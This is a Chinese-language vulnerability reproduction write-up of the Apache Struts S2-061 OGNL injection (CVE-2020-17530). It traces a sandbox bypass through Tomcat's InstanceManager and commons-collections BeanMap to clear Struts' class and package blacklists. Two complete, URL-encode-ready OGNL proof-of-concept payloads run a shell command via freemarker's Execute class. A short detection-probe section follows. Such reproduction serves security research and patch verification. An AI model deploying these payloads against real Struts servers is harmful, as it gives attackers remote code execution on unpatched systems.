(CVE-2020-17530)S2-061

漏洞描述

本次漏洞是对S2-059漏洞修复后的绕过。S2-059的修复补丁仅修复了沙盒绕过,但是并没有修复OGNL表达式的执行。但是在最新版本2.5.26版本中OGNL表达式的执行也修复了。

漏洞影响版本

struts 2.0.0 - struts 2.5.25

漏洞分析

本文仅是对S2-061进行复现,并且对复现的过程进行记录,具体的分析思路可以参考 安恒信息安全研究院-Struts2 S2-061漏洞分析(CVE-2020-17530)

Smi1e师傅tql 膜了 呜呜呜

漏洞复现

测试环境

    IDEA 2019.3.5
    Struts2 2.5.26/Struts2 2.3.33
    Apache-Tomcat-8.5.57

相关依赖包


注意,搭建测试环境的时候,除了下载struts2的最小依赖包(struts-2.x.xx-min-lib.zip)以外,本次的环境,还需要依赖同版本包下的commons-collections-x.x.jar,可以在struts-2.x.xx-lib.zip中找到版本对应的包,后续会说明为什么一定需要这个包。

2.3.3相关依赖包

img

2.5.25相关依赖包

img

复现思路简略说明(具体思路请移步上文中的漏洞分析文章)

首先找到struts2标签解析的入口,也是我们本次漏洞Debug跟踪的重点。

img

全方法名:org.apache.struts2.views.jsp.ComponentTagSupport#doStartTag

这里是标签解析的开始方法,同时这里能够观测到整个OgnlValueStack对象,也是我们开始寻找利用点的地方。

其中我们本次要使用的利用点就stack中断点可以找到(这一步在前面的思路分析中可以找到,但是因为debug点没有描述清楚,一开始找了很久,最后在查阅其他版本的文章分析才找到这个位置):

img

从上文中的位置,我们可以得到获取这个对象的获取调用链,如下图

img

转换为ognl表达式后如下:#application.get('org.apache.tomcat.InstanceManager')

org.apache.catalina.core.DefaultInstanceManager 的方法不做过多描述,借用分析文章中的一张图,可以使用这个对象中的newInstance方法实例化任意无参构造方法的类并返回。

img

创建org.apache.commons.collections.BeanMap对象(本次的漏洞复现的主角,同时这个包就在commons-collections-x.x.jar中)

img

API简要描述(若想看详细方法分析,请移步到上文的分析文章):

       Object get("xxxx")            实际相当于调用内部对象的getXxx,比如getName()
       Object put("xxxx",Object)    实际相当于调用内部对象的,setXxxx,比如setName()
       void setBean(Object)        重新设置内部对象,设置完成后上面两个才能生效
       Object getBean()            获取内部对象,这里可以在断点的时候查看到当前map中的实际对象

整体创建的Ognl表达式(这里存放到application中,方便多次请求使用)

%{#application.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')}

获取到OgnlContext对象 (实际就是#attr#request 等map对象中的 struts.valueStack)并且设置到上一步的BeanMap中,用于绕过沙盒限制,进行内部方法调用。

img

Ognl表达式代码

%{#application.map.setBean(#request.get('struts.valueStack'))}

使用3和4同样的原理,利用 BeanMap使用com.opensymphony.xwork2.ognl.OgnlValueStack 中的 getContext 方法间接获取到 OgnlContext,并且重新设置到一个新的BeanMap中。

img

这里把两个步骤的Ognl代码同时贴出来

   # 注意,自行调试的话,需要分两次执行
   %{#application.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')}

   %{#application.map2.setBean(#application.get('map').get('context'))}

使用上面的原理,使用第二步得到的OgnlContext获取到内部的com.opensymphony.xwork2.ognl.SecurityMemberAccess对象,在设置到新的BeanMap中,用于重置黑名单

img

# 注意,自行调试的话,需要分两次执行
%{#application.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')}

%{#application.map3.setBean(#application.get('map2').get('memberAccess'))}

确认一下之前存放的Map都正确存下来了,不然岂不是白忙活,其实每一步执行完后,都可以查看一次,确认每一步都是操作正确的,这里我就一次过了。

img

前面的操作都确认没有问题后,就可以调用方法重置黑名单了,主要API为com.opensymphony.xwork2.ognl.SecurityMemberAccess#setExcludedClassescom.opensymphony.xwork2.ognl.SecurityMemberAccess#setExcludedPackageNames,如下图

img

在我们这两个地方打了断点后,我们请求下面或者前面的ognl可以发现,在每次收到请求的时候,都会调用一次这里的黑名单赋值,也就是说,就算是我们在本次请求重置了黑名单,在下次请求的时候,黑名单还是会重置。因此只有前面的ognl可以持久化存储,实际利用的时候,必须要在一个请求中进行命令执行。下文还会有一个存放在request中的poc。

初次请求赋值:

img

img

执行下面清空黑名单代码的重新赋值

img

img

清7空黑名单的ognl代码

# 注意,自行调试的话,需要分两次执行
   #application.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))

   #application.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet'))

这里就可以使用黑名单中的freemarker.template.utility.Execute类中的exec方法执行Shell了。需要最少和前面的8一起使用,才能执行成功。可以直接使用最后面的完整poc代码执行。

img

img

执行shell的ognl代码

#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'})

完整POC

使用application,就是上面思路的完整POC

%{
(#application.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#application.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + 

(#application.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +
(#application.map2.setBean(#application.get('map').get('context')) == true).toString().substring(0,0) + 


(#application.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#application.map3.setBean(#application.get('map2').get('memberAccess')) == true).toString().substring(0,0) + 

(#application.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + 
(#application.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +

(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))
}

使用request,单次请求有效的完整POC (推荐)

%{
(#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + 

(#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + 


(#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + 

(#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + 
(#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +

(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))
}

注意:请使用url对以上的OGNL代码编码后,再在工具上使用。

检测思路

在新版本的struts2中,已经不能通过参数构造来解析ognl表达式了,所以如果考虑想要使用脚本来进行批量扫描是否有本漏洞的时候,可以考虑直接爆破所有参数,然后判断页面中是否有预计的结果文本即可。

比如:

%{ ‘gcowsec-‘ + (2000 + 20).toString()}

预计会得到

gcowsec-2020

使用脚本判断结果中是否包含就可以了

总结

此次漏洞只是S2-059修复的一个绕过,并且本次利用的核心类org.apache.commons.collections.BeanMapcommons-collections-x.x.jar包中,但是在官方的最小依赖包中并没有包含这个包。所以即使扫到了支持OGNL表达式的注入点,但是如果没有使用这个依赖包,也还是没办法进行利用。